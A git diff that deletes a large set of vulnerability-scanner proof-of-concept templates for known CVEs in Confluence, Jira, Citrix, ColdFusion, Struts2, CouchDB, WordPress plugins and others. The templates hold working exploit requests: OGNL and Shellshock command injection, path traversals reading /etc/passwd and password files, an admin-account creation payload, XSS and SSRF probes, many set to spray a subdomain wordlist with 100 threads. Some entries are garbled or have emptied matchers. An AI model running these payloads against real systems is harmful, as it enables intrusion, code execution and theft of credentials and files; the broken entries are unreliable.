-binding: ad11e1b0-1ddc-4184-b81a-e8b6306b8a2d
-manual: true
-detail:
- author: Xz
- links:
- - http://wiki.peiqi.tech/wiki/webapp/AtlassianConfluence/Atlassian%20Confluence%20OGNL注入漏洞%20CVE-2022-26134.html
- vulnerability:
- id: CT-433592
- level: critical
- description: Confulence CVE-2022-26134 命令执行
-transport: http
-set:
- randomHeader: randomLowercase(18)
- randomValue: randomLowercase(18)
-rules:
- r0:
- request:
- cache: true
- method: POST
- path: /${@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("{{randomHeader}}","{{randomValue}}")}/
- headers:
- Content-Type: application/x-www-form-urlencoded
- expression: response.headers[randomHeader].contains(randomValue)
-expression: r0()
diff --git a/tmp/cve/atlassian-jira-idor-cve-2022-0540.yml b/tmp/cve/atlassian-jira-idor-cve-2022-0540.yml
deleted file mode 100755
index 6fb58b586d..0000000000
--- a/tmp/cve/atlassian-jira-idor-cve-2022-0540.yml
+++ /dev/null
@@ -1,20 +0,0 @@
-name: poc-yaml-atlassian-jira-cve-2022-0540
-binding: 7a3203da-7c0a-4d83-b30e-75a583c0c437
-manual: true
-detail:
- author: Xz
- links:
- - https://paper.seebug.org/1961/#_8
- vulnerability:
- id: CT-421252
- level: critical
- description: CVE-2022-0540 Jira 身份验证绕过漏洞
-transport: http
-rules:
- r0:
- request:
- cache: true
- method: GET
- path: /InsightPluginShowGeneralConfiguration.jspa;
- expression: response.status == 200 && (response.body.bcontains(bytes("General Insight Configuration")) || response.body.bcontains(bytes("常规 Insight 配置")) || response.body.bcontains(bytes("一般 Insight 配置"))) && response.body_string.contains("onClick=\"window.location.href='InsightPluginUpdateGeneralConfiguration.jspa'\"")
-expression: r0()
diff --git a/tmp/cve/bash-cve-2014-6271.yaml b/tmp/cve/bash-cve-2014-6271.yaml
deleted file mode 100644
index 9d00aa3d3c..0000000000
--- a/tmp/cve/bash-cve-2014-6271.yaml
+++ /dev/null
@@ -1,20 +0,0 @@
-name: poc-yaml-bash-cve-2014-6271
-manual: true
-transport: http
-set:
- r1: randomInt(800000000, 1000000000)
- r2: randomInt(800000000, 1000000000)
-rules:
- r0:
- request:
- cache: true
- method: GET
- headers:
- User-Agent: () { :; }; echo; echo; /bin/bash -c 'expr {{r1}} + {{r2}}'
- follow_redirects: false
- expression: response.body.bcontains(bytes(string(r1 + r2)))
-expression: r0()
-detail:
- author: neal1991(https://github.com/neal1991)
- links:
- - https://github.com/opsxcq/exploit-CVE-2014-6271
diff --git a/tmp/cve/cisco-cve-2020-3452-readfile.yaml b/tmp/cve/cisco-cve-2020-3452-readfile.yaml
deleted file mode 100644
index c5eab60cdc..0000000000
--- a/tmp/cve/cisco-cve-2020-3452-readfile.yaml
+++ /dev/null
@@ -1,17 +0,0 @@
-name: poc-yaml-cisco-cve-2020-3452-readfile
-manual: true
-transport: http
-rules:
- r0:
- request:
- cache: true
- method: GET
- path: /+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua
- follow_redirects: false
- expression: response.status == 200 && response.headers["Content-Type"] == "application/octet-stream" && response.body.bcontains(b"INTERNAL_PASSWORD_ENABLED")
-expression: r0()
-detail:
- author: JrD (https://github.com/JrDw0/)
- links:
- - https://nvd.nist.gov/vuln/detail/CVE-2020-3452
- - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86
diff --git a/tmp/cve/citrix-cve-2019-19781-path-traversal.yaml b/tmp/cve/citrix-cve-2019-19781-path-traversal.yaml
deleted file mode 100644
index 07a7c2e14d..0000000000
--- a/tmp/cve/citrix-cve-2019-19781-path-traversal.yaml
+++ /dev/null
@@ -1,16 +0,0 @@
-name: poc-yaml-citrix-cve-2019-19781-path-traversal
-manual: true
-transport: http
-rules:
- r0:
- request:
- cache: true
- method: GET
- path: /vpn/../vpns/cfg/smb.conf
- follow_redirects: false
- expression: response.status == 200 && response.body.bcontains(b"encrypt passwords") && response.body.bcontains(b"name resolve order")
-expression: r0()
-detail:
- author: su(https://suzzz112113.github.io/#blog)
- links:
- - https://www.tripwire.com/state-of-security/vert/citrix-netscaler-cve-2019-19781-what-you-need-to-know/
diff --git a/tmp/cve/citrix-cve-2020-8191-xss.yaml b/tmp/cve/citrix-cve-2020-8191-xss.yaml
deleted file mode 100644
index 35cdb692e1..0000000000
--- a/tmp/cve/citrix-cve-2020-8191-xss.yaml
+++ /dev/null
@@ -1,23 +0,0 @@
-name: poc-yaml-citrix-cve-2020-8191-xss
-manual: true
-transport: http
-set:
- r1: randomLowercase(6)
-rules:
- r0:
- request:
- cache: true
- method: POST
- path: /menu/stapp
- headers:
- Content-Type: application/x-www-form-urlencoded
- body: sid=254&pe=1%2C2%2C3%2C4%2C5&appname=%0D%0A%3C%2Ftitle%3E%3Cscript%3Ealert%28{{r1}}%29%3B%3C%2Fscript%3E&au=1&username=nsroot
- follow_redirects: true
- expression: response.body.bcontains(bytes("")) && response.body.bcontains(b"citrix")
-expression: r0()
-detail:
- author: JingLing(https://hackfun.org/)
- links:
- - https://support.citrix.com/article/CTX276688
- - https://www.citrix.com/blogs/2020/07/07/citrix-provides-context-on-security-bulletin-ctx276688/
- - https://dmaasland.github.io/posts/citrix.html
diff --git a/tmp/cve/citrix-cve-2020-8193-unauthorized.yaml b/tmp/cve/citrix-cve-2020-8193-unauthorized.yaml
deleted file mode 100644
index 1d7a59dd59..0000000000
--- a/tmp/cve/citrix-cve-2020-8193-unauthorized.yaml
+++ /dev/null
@@ -1,25 +0,0 @@
-name: poc-yaml-citrix-cve-2020-8193-unauthorized
-manual: true
-transport: http
-set:
- user: randomLowercase(8)
- pass: randomLowercase(8)
-rules:
- r0:
- request:
- cache: true
- method: POST
- path: /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1
- headers:
- Content-Type: application/xml
- X-NITRO-PASS: '{{pass}}'
- X-NITRO-USER: '{{user}}'
- body:
- follow_redirects: false
- expression: response.status == 406 && "(?i)SESSID=\\w{32}".bmatches(bytes(response.headers["Set-Cookie"]))
-expression: r0()
-detail:
- author: bufsnake(https://github.com/bufsnake)
- links:
- - https://github.com/PR3R00T/CVE-2020-8193-Citrix-Scanner/blob/master/scanner.py
- - https://blog.unauthorizedaccess.nl/2020/07/07/adventures-in-citrix-security-research.html
diff --git a/tmp/cve/citrix-xenmobile-cve-2020-8209.yaml b/tmp/cve/citrix-xenmobile-cve-2020-8209.yaml
deleted file mode 100644
index a2e2922969..0000000000
--- a/tmp/cve/citrix-xenmobile-cve-2020-8209.yaml
+++ /dev/null
@@ -1,16 +0,0 @@
-name: poc-yaml-citrix-xenmobile-cve-2020-8209
-manual: true
-transport: http
-rules:
- r0:
- request:
- cache: true
- method: GET
- path: /jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd
- follow_redirects: false
- expression: response.status == 200 && response.content_type.contains("octet-stream") && "^root:[x*]:0:0:".bmatches(response.body)
-expression: r0()
-detail:
- author: B1anda0(https://github.com/B1anda0)
- links:
- - https://nvd.nist.gov/vuln/detail/CVE-2020-8209
diff --git a/tmp/cve/coldfusion-cve-2010-2861-lfi.yaml b/tmp/cve/coldfusion-cve-2010-2861-lfi.yaml
deleted file mode 100644
index c018f0e960..0000000000
--- a/tmp/cve/coldfusion-cve-2010-2861-lfi.yaml
+++ /dev/null
@@ -1,17 +0,0 @@
-name: poc-yaml-coldfusion-cve-2010-2861-lfi
-manual: true
-transport: http
-rules:
- r0:
- request:
- cache: true
- method: GET
- path: /CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en
- follow_redirects: true
- expression: response.status == 200 && response.body.bcontains(b"rdspassword=") && response.body.bcontains(b"encrypted=")
-expression: r0()
-detail:
- author: sharecast
- links:
- - https://github.com/vulhub/vulhub/tree/master/coldfusion/CVE-2010-2861
- version: 8.0, 8.0.1, 9.0, 9.0.1 and earlier versions
diff --git a/tmp/cve/confluence-cve-2015-8399.yaml b/tmp/cve/confluence-cve-2015-8399.yaml
deleted file mode 100644
index 1c60944d8e..0000000000
--- a/tmp/cve/confluence-cve-2015-8399.yaml
+++ /dev/null
@@ -1,16 +0,0 @@
-name: poc-yaml-confluence-cve-2015-8399
-manual: true
-transport: http
-rules:
- r0:
- request:
- cache: true
- method: GET
- path: /spaces/viewdefaultdecorator.action?decoratorName
- follow_redirects: false
- expression: response.status == 200 && response.body.bcontains(b"confluence-init.properties") && response.body.bcontains(b"View Default Decorator")
-expression: r0()
-detail:
- author: whynot(https://github.com/notwhy)
- links:
- - https://www.anquanke.com/vul/id/1150798
diff --git a/tmp/cve/confluence-cve-2019-3396-lfi.yaml b/tmp/cve/confluence-cve-2019-3396-lfi.yaml
deleted file mode 100644
index a9f6a8f862..0000000000
--- a/tmp/cve/confluence-cve-2019-3396-lfi.yaml
+++ /dev/null
@@ -1,21 +0,0 @@
-name: poc-yaml-confluence-cve-2019-3396-lfi
-manual: true
-transport: http
-rules:
- r0:
- request:
- cache: true
- method: POST
- path: /rest/tinymce/1/macro/preview
- headers:
- Content-Type: application/json
- Host: localhost
- Referer: http://localhost
- body: '{"contentId":"786458","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/test","width":"1000","height":"1000","_template":"../web.xml"}}}'
- follow_redirects: true
- expression: response.status == 200 && response.body.bcontains(b"contextConfigLocation")
-expression: r0()
-detail:
- author: sharecast
- links:
- - https://github.com/vulhub/vulhub/tree/master/confluence/CVE-2019-3396
diff --git a/tmp/cve/confluence-cve-2019-3396-lfi.yml b/tmp/cve/confluence-cve-2019-3396-lfi.yml
deleted file mode 100644
index 7e9c13141d..0000000000
--- a/tmp/cve/confluence-cve-2019-3396-lfi.yml
+++ /dev/null
@@ -1,21 +0,0 @@
-name: poc-yaml-confluence-cve-2019-3396-lfi
-manual: true
-transport: http
-rules:
- r0:
- request:
- cache: true
- method: POST
- path: /rest/tinymce/1/macro/preview
- headers:
- Content-Type: application/json
- Host: localhost
- Referer: http://localhost
- body: '{"contentId":"786458","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/testnmanp","width":"1000","height":"1000","_template":"../web.xml"}}}'
- follow_redirects: true
- expression: response.status == 200 && response.body.bcontains(b"contextConfigLocation")
-expression: r0()
-detail:
- author: sharecast
- links:
- - https://github.com/vulhub/vulhub/tree/master/confluence/CVE-2019-3396
diff --git a/tmp/cve/confluence-cve-2021-26084.yaml b/tmp/cve/confluence-cve-2021-26084.yaml
deleted file mode 100644
index 112d1f59d3..0000000000
--- a/tmp/cve/confluence-cve-2021-26084.yaml
+++ /dev/null
@@ -1,20 +0,0 @@
-name: poc-yaml-confluence-cve-2021-26084
-manual: true
-transport: http
-set:
- r1: randomInt(100000, 999999)
- r2: randomInt(100000, 999999)
-rules:
- r0:
- request:
- cache: true
- method: POST
- path: /pages/createpage-entervariables.action?SpaceKey=x
- body: |
- queryString=\u0027%2b%7b{{r1}}%2B{{r2}}%7d%2b\u0027
- expression: response.status == 200 && response.body.bcontains(bytes(string(r1 + r2)))
-expression: r0()
-detail:
- author: Loneyer(https://github.com/Loneyers)
- links:
- - https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html
diff --git a/tmp/cve/confluence-cve-2021-26085-arbitrary-file-read.yaml b/tmp/cve/confluence-cve-2021-26085-arbitrary-file-read.yaml
deleted file mode 100644
index 1fa77ff877..0000000000
--- a/tmp/cve/confluence-cve-2021-26085-arbitrary-file-read.yaml
+++ /dev/null
@@ -1,18 +0,0 @@
-name: poc-yaml-confluence-cve-2021-26085-arbitrary-file-read
-manual: true
-transport: http
-set:
- rand: randomLowercase(6)
-rules:
- r0:
- request:
- cache: true
- method: GET
- path: /s/{{rand}}/_/;/WEB-INF/web.xml
- follow_redirects: false
- expression: response.status == 200 && response.body.bcontains(b"Confluence") && response.body.bcontains(b"com.atlassian.confluence.setup.ConfluenceAppConfig")
-expression: r0()
-detail:
- author: wulalalaaa(https://github.com/wulalalaaa)
- links:
- - https://packetstormsecurity.com/files/164401/Atlassian-Confluence-Server-7.5.1-Arbitrary-File-Read.html
diff --git a/tmp/cve/couchcms-cve-2018-7662.yaml b/tmp/cve/couchcms-cve-2018-7662.yaml
deleted file mode 100644
index a2b1233571..0000000000
--- a/tmp/cve/couchcms-cve-2018-7662.yaml
+++ /dev/null
@@ -1,23 +0,0 @@
-name: poc-yaml-couchcms-cve-2018-7662
-manual: true
-transport: http
-rules:
- r0:
- request:
- cache: true
- method: GET
- path: /includes/mysql2i/mysql2i.func.php
- follow_redirects: false
- expression: 'response.status == 200 && response.body.bcontains(b"mysql2i.func.php on line 10") && response.body.bcontains(b"Fatal error: Cannot redeclare mysql_affected_rows() in")'
- r1:
- request:
- cache: true
- method: GET
- path: /addons/phpmailer/phpmailer.php
- follow_redirects: false
- expression: 'response.status == 200 && response.body.bcontains(b"phpmailer.php on line 10") && response.body.bcontains(b"Fatal error: Call to a menber function add_event_listener() on a non-object in")'
-expression: r0() && r1()
-detail:
- author: we1x4n(https://we1x4n.github.io/)
- links:
- - https://github.com/CouchCMS/CouchCMS/issues/46
diff --git a/tmp/cve/couchdb-cve-2017-12635.yaml b/tmp/cve/couchdb-cve-2017-12635.yaml
deleted file mode 100644
index 09b730d2cb..0000000000
--- a/tmp/cve/couchdb-cve-2017-12635.yaml
+++ /dev/null
@@ -1,29 +0,0 @@
-name: poc-yaml-couchdb-cve-2017-12635
-manual: true
-transport: http
-set:
- r1: randomLowercase(32)
-rules:
- r0:
- request:
- cache: true
- method: PUT
- path: /_users/org.couchdb.user:{{r1}}
- headers:
- Content-Length: "192"
- Content-Type: application/json
- body: |-
- {
- "type": "user",
- "name": "{{r1}}",
- "roles": ["_admin"],
- "roles": [],
- "password": "fVyuyAECgYEAhgJzkPO1sTV1Dvs5bvls4tyVAsLy2I7wHKWJvJdDUpox2TnCMFT9"
- }
- follow_redirects: false
- expression: response.status == 201 && response.body.bcontains(bytes("org.couchdb.user:" + r1))
-expression: r0()
-detail:
- author: j4ckzh0u(https://github.com/j4ckzh0u)
- links:
- - https://github.com/vulhub/vulhub/tree/master/couchdb/CVE-2017-12635
diff --git a/tmp/cve/craftcms-seomatic-cve-2020-9757-rce.yaml b/tmp/cve/craftcms-seomatic-cve-2020-9757-rce.yaml
deleted file mode 100644
index f6445561f8..0000000000
--- a/tmp/cve/craftcms-seomatic-cve-2020-9757-rce.yaml
+++ /dev/null
@@ -1,25 +0,0 @@
-name: poc-yaml-craftcms-seomatic-cve-2020-9757-rce
-manual: true
-transport: http
-set:
- r1: randomInt(40000, 44800)
- r2: randomInt(40000, 44800)
-rules:
- poc10:
- request:
- cache: true
- method: GET
- path: /actions/seomatic/meta-container/meta-link-container/?uri={{{{r1}}*'{{r2}}'}}
- expression: response.status == 200 && response.body.bcontains(bytes("MetaLinkContainer")) && response.body.bcontains(bytes("canonical")) && response.body.bcontains(bytes(string(r1 * r2)))
- poc20:
- request:
- cache: true
- method: GET
- path: /actions/seomatic/meta-container/all-meta-containers?uri={{{{r1}}*'{{r2}}'}}
- expression: response.status == 200 && response.body.bcontains(bytes("MetaLinkContainer")) && response.body.bcontains(bytes("canonical")) && response.body.bcontains(bytes(string(r1 * r2)))
-expression: poc10() || poc20()
-detail:
- author: x1n9Qi8
- links:
- - http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-202003-181
- - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9757
diff --git a/tmp/cve/cve-2005-2428-1312.yaml b/tmp/cve/cve-2005-2428-1312.yaml
deleted file mode 100644
index c537b9605f..0000000000
--- a/tmp/cve/cve-2005-2428-1312.yaml
+++ /dev/null
@@ -1,18 +0,0 @@
-id: cve-2005-2428
-info:
- name: Lotus Domino Sensitive Information Leak
- risk: Medium
-params:
- - root: '{{.BaseURL}}'
-requests:
- - method: GET
- redirect: false
- url: >-
- {{.root}}/names.nsf/People?OpenView
- headers:
- - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
- detections:
- - >-
- StatusCode() == 200 && RegexSearch('resBody', '(-
- {{.root}}/names.nsf/People?OpenView
- headers:
- - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
- detections:
- - >-
- StatusCode() == 200 && RegexSearch('resBody', '(\""
diff --git a/tmp/cve/cve-2006-1681-1325.yaml b/tmp/cve/cve-2006-1681-1325.yaml
deleted file mode 100644
index ba69b12a16..0000000000
--- a/tmp/cve/cve-2006-1681-1325.yaml
+++ /dev/null
@@ -1,31 +0,0 @@
-id: CVE-2006-1681
-info:
- name: Cherokee HTTPD <=0.5 XSS
- description: Cross-site scripting (XSS) vulnerability in Cherokee HTTPD 0.5 and earlier allows remote attackers to inject arbitrary web script or HTML via a malformed request that generates an HTTP 400 error, which is not properly handled when the error message is generated.
- reference:
- - https://www.securityfocus.com/bid/17408
- - https://nvd.nist.gov/vuln/detail/CVE-2006-1681
- author: geeknik
- severity: medium
- tags: cherokee,httpd,xss,cve,cve2006
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- GET /%2F..%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
- Host: {{Subdomains}}
- matchers-condition: and
- matchers:
- - type: status
- status:
- - 200
- - type: word
- words:
- - ""
- - type: word
- part: header
- words:
- - text/html
diff --git a/tmp/cve/cve-2007-0885-1334.yaml b/tmp/cve/cve-2007-0885-1334.yaml
deleted file mode 100644
index 3749695d9e..0000000000
--- a/tmp/cve/cve-2007-0885-1334.yaml
+++ /dev/null
@@ -1,32 +0,0 @@
-id: CVE-2007-0885
-info:
- name: Rainbow.Zen Jira XSS
- description: Cross-site scripting (XSS) vulnerability in jira/secure/BrowseProject.jspa in Rainbow with the Zen (Rainbow.Zen) extension allows remote attackers to inject arbitrary web script or HTML via the id parameter.
- reference: https://www.securityfocus.com/archive/1/459590/100/0/threaded
- author: geeknik
- severity: medium
- tags: cve,cve2007,jira,xss
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- GET /jira/secure/BrowseProject.jspa?id="> HTTP/1.1
- Host: {{Subdomains}}
- User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
- Accept-Encoding: gzip, deflate
- Accept: */*
- matchers-condition: and
- matchers:
- - type: word
- words:
- - "\">"
- - type: status
- status:
- - 200
- - type: word
- part: header
- words:
- - "text/html"
diff --git a/tmp/cve/cve-2007-4504-1340.yaml b/tmp/cve/cve-2007-4504-1340.yaml
deleted file mode 100644
index c2276ccab4..0000000000
--- a/tmp/cve/cve-2007-4504-1340.yaml
+++ /dev/null
@@ -1,30 +0,0 @@
-id: CVE-2007-4504
-info:
- name: Joomla! Component RSfiles 1.0.2 - 'path' File Download
- author: daffainfo
- severity: high
- description: Directory traversal vulnerability in index.php in the RSfiles component (com_rsfiles) 1.0.2 and earlier for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the path parameter in a files.display action.
- reference:
- - https://www.exploit-db.com/exploits/4307
- - https://www.cvedetails.com/cve/CVE-2007-4504
- tags: cve,cve2007,joomla,lfi
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- GET /index.php?option=com_rsfiles&task=files.display&path=../../../../../../../../../etc/passwd HTTP/1.1
- Host: {{Subdomains}}
- User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
- Accept-Encoding: gzip, deflate
- Accept: */*
- matchers-condition: and
- matchers:
- - type: regex
- regex:
- - "root:.*:0:0"
- - type: status
- status:
- - 200
diff --git a/tmp/cve/cve-2007-4556-1345.yaml b/tmp/cve/cve-2007-4556-1345.yaml
deleted file mode 100644
index 8097df92d2..0000000000
--- a/tmp/cve/cve-2007-4556-1345.yaml
+++ /dev/null
@@ -1,29 +0,0 @@
-id: CVE-2007-4556
-info:
- name: Apache Struts2 S2-001 RCE
- author: pikpikcu
- severity: critical
- description: Struts support in OpenSymphony XWork before 1.2.3, and 2.x before 2.0.4, as used in WebWork and Apache Struts, recursively evaluates all input as an Object-Graph Navigation Language (OGNL) expression when altSyntax is enabled, which allows remote attackers to cause a denial of service (infinite loop) or execute arbitrary code via form input beginning with a "%{" sequence and ending with a "}" character.
- reference: https://www.guildhab.top/?p=2326
- tags: cve,cve2007,apache,rce,struts
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- POST /login.action HTTP/1.1
- Host: {{Subdomains}}
- Content-Type: application/x-www-form-urlencoded
-
- username=test&password=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D
- matchers-condition: and
- matchers:
- - type: regex
- regex:
- - "root:[x*]:0:0"
- part: body
- - type: status
- status:
- - 200
diff --git a/tmp/cve/cve-2008-2398-1354.yaml b/tmp/cve/cve-2008-2398-1354.yaml
deleted file mode 100644
index 9315ea01d3..0000000000
--- a/tmp/cve/cve-2008-2398-1354.yaml
+++ /dev/null
@@ -1,30 +0,0 @@
-id: CVE-2008-2398
-info:
- name: AppServ Open Project 2.5.10 and earlier XSS
- author: unstabl3
- severity: medium
- description: Cross-site scripting (XSS) vulnerability in index.php in AppServ Open Project 2.5.10 and earlier allows remote attackers to inject arbitrary web script or HTML via the appservlang parameter.
- reference: https://exchange.xforce.ibmcloud.com/vulnerabilities/42546
- tags: cve,cve2008,xss
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- GET /index.php?appservlang=%3Csvg%2Fonload=confirm%28%27xss%27%29%3E HTTP/1.1
- Host: {{Subdomains}}
- matchers-condition: and
- matchers:
- - type: status
- status:
- - 200
- - type: word
- words:
- - " "
- - "java.sun.com"
- part: body
- condition: and
- - type: word
- part: header
- words:
- - "application/xml"
diff --git a/tmp/cve/cve-2015-7823-2607.yaml b/tmp/cve/cve-2015-7823-2607.yaml
deleted file mode 100644
index 8622df2be2..0000000000
--- a/tmp/cve/cve-2015-7823-2607.yaml
+++ /dev/null
@@ -1,28 +0,0 @@
-id: CVE-2015-7823
-
-info:
- name: Kentico CMS 8.2 Open Redirection
- author: 0x_Akoko
- description: The GetDocLink.ashx with link variable is vulnerable to open redirect vulnerability
- reference: |
- - https://packetstormsecurity.com/files/133981/Kentico-CMS-8.2-Cross-Site-Scripting-Open-Redirect.html
- - https://nvd.nist.gov/vuln/detail/CVE-2015-7823
- severity: low
- tags: cve,cve2015,kentico,redirect
-
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
-
- raw:
- - |
- GET /CMSPages/GetDocLink.ashx?link=https://example.com/ HTTP/1.1
- Host: {{Subdomains}}
- User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
- matchers:
- - type: regex
- regex:
- - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
- part: header
\ No newline at end of file
diff --git a/tmp/cve/cve-2015-8349-2611.yaml b/tmp/cve/cve-2015-8349-2611.yaml
deleted file mode 100644
index 95d492da3e..0000000000
--- a/tmp/cve/cve-2015-8349-2611.yaml
+++ /dev/null
@@ -1,33 +0,0 @@
-id: CVE-2015-8349
-info:
- name: SourceBans XSS
- author: pikpikcu
- severity: medium
- description: Cross-site scripting (XSS) vulnerability in SourceBans before 2.0 pre-alpha allows remote attackers to inject arbitrary web script or HTML via the advSearch parameter to index.php.
- reference: https://nvd.nist.gov/vuln/detail/CVE-2015-8349
- tags: cve,cve2015,xss,sourcebans
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- GET /index.php?p=banlist&advSearch=0%27%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&advType=btype HTTP/1.1
- Host: {{Subdomains}}
- User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
- Accept-Encoding: gzip, deflate
- Accept: */*
- matchers-condition: and
- matchers:
- - type: word
- words:
- - ''
- part: body
- - type: status
- status:
- - 200
- - type: word
- part: header
- words:
- - text/
diff --git a/tmp/cve/cve-2015-8399-2616.yaml b/tmp/cve/cve-2015-8399-2616.yaml
deleted file mode 100644
index 616bc9fd58..0000000000
--- a/tmp/cve/cve-2015-8399-2616.yaml
+++ /dev/null
@@ -1,28 +0,0 @@
-id: CVE-2015-8399
-info:
- author: princechaddha
- name: Atlassian Confluence configuration files read
- severity: medium
- description: Atlassian Confluence before 5.8.17 allows remote authenticated users to read configuration files via the decoratorName parameter to (1) spaces/viewdefaultdecorator.action or (2) admin/viewdefaultdecorator.action.
- reference: https://jira.atlassian.com/browse/CONFSERVER-39704?src=confmacro
- tags: cve,cve2015,atlassian,confluence
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- GET /spaces/viewdefaultdecorator.action?decoratorName HTTP/1.1
- Host: {{Subdomains}}
- matchers-condition: and
- matchers:
- - type: status
- status:
- - 200
- - type: word
- words:
- - "confluence-init.properties"
- - "View Default Decorator"
- condition: and
- part: body
diff --git a/tmp/cve/cve-2015-8813-2624.yaml b/tmp/cve/cve-2015-8813-2624.yaml
deleted file mode 100644
index 8319a8e891..0000000000
--- a/tmp/cve/cve-2015-8813-2624.yaml
+++ /dev/null
@@ -1,19 +0,0 @@
-id: CVE-2015-8813
-info:
- name: Umbraco SSRF Vulnerability in Feedproxy.aspx
- author: emadshanab
- severity: high
- description: A Server Side Request Forgery (SSRF) vulnerability in Umbraco in Feedproxy.aspx allows attackers to send arbitrary HTTP GET requests.Once you change the URL to the http://local/Umbraco/feedproxy.aspx?url=http://127.0.0.1:80/index, you able to access the localhost application of the server
- reference: |
- - https://blog.securelayer7.net/umbraco-the-open-source-asp-net-cms-multiple-vulnerabilities/
- - https://nvd.nist.gov/vuln/detail/CVE-2015-8813
- tags: cve,cve2015,ssrf,oob
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- GET /Umbraco/feedproxy.aspx?url=http://{{Host}}.{{Port}}.{{Subdomains}}.2015.8813.{{MY-DOMAIN}} HTTP/1.1
- Host: {{Subdomains}}
diff --git a/tmp/cve/cve-2015-9414-2626.yaml b/tmp/cve/cve-2015-9414-2626.yaml
deleted file mode 100644
index 6aaf4b5566..0000000000
--- a/tmp/cve/cve-2015-9414-2626.yaml
+++ /dev/null
@@ -1,31 +0,0 @@
-id: CVE-2015-9414
-info:
- name: WP Symposium <= 15.8.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)
- author: daffainfo
- severity: medium
- reference:
- - https://wpscan.com/vulnerability/2ac2d43f-bf3f-4831-9585-5c5484051095
- - https://nvd.nist.gov/vuln/detail/CVE-2015-9414
- tags: cve,cve2015,wordpress,wp-plugin,xss
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- GET /wp-content/plugins/wp-symposium/get_album_item.php?size=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
- Host: {{Subdomains}}
- matchers-condition: and
- matchers:
- - type: word
- words:
- - ''
- part: body
- - type: word
- part: header
- words:
- - text/html
- - type: status
- status:
- - 200
diff --git a/tmp/cve/cve-2015-9480-2631.yaml b/tmp/cve/cve-2015-9480-2631.yaml
deleted file mode 100644
index 179f1e955b..0000000000
--- a/tmp/cve/cve-2015-9480-2631.yaml
+++ /dev/null
@@ -1,28 +0,0 @@
-id: CVE-2015-9480
-info:
- name: WordPress Plugin RobotCPA 5 - Directory Traversal
- author: daffainfo
- severity: high
- reference: |
- - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-9480
- - https://www.exploit-db.com/exploits/37252
- tags: cve,cve2015,wordpress,wp-plugin,lfi
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- GET /wp-content/plugins/robotcpa/f.php?l=ZmlsZTovLy9ldGMvcGFzc3dk HTTP/1.1
- Host: {{Subdomains}}
- User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
- matchers-condition: and
- matchers:
- - type: regex
- regex:
- - "root:[0*]:0:0"
- part: body
- - type: status
- status:
- - 200
